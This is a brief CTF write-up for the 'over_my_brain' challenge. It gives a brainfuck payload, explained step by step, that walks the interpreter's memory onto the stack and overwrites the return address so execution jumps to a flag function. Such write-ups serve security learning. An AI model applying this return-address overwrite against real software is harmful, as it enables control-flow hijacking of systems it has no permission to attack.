Rating:

Running the binary with the input "+"*4+"A"*140 gives us a stack a layout like this:

Our plan is to change return address with the address of flag

The payload is: ">"*8+"+["+">"*16+"-"*0x15+"]"+"<"*32+"[[-]>]<<<"+"+"*0x10+"[<++++<+<"+"+"*0xc+">>>-]<<+<++++++"

  1. Shift 8 bytes to right
    • ">"*8
  2. Move 16 bytes to right till you find the byte 0x15
    • "+["+">"*16+"-"*0x15+"]"
  3. Move 32 bytes to left to land on the return address
    • "<"*32
  4. Clear the return address
    • "[[-]>]<<<"
  5. Modify the return address with the address of flag
    • "+"*0x10+"[<++++<+<"+"+"*0xc+">>>-]<<+<++++++"

For the full solution, check over_my_brain.py

Original writeup (https://github.com/korcankaraokcu/CTF-Writeups/tree/master/AngstromCTF/over_my_brain/Solution).